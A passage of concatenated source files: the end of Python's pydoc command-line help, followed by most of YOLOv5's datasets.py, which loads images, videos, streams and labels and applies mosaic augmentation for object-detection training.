cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from zipfile import ZipFile
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import (LOGGER, check_dataset, check_requirements, check_yaml, clean_str, segments2boxes, xyn2xy,
xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1)) # DPP
NUM_THREADS = min(8, max(1, os.cpu_count() - 1)) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix='', shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // WORLD_SIZE, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn), dataset
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] *= 0
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.img_files) # same hash
except:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs, self.img_npy = [None] * n, [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, f'Image Not Found {path}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
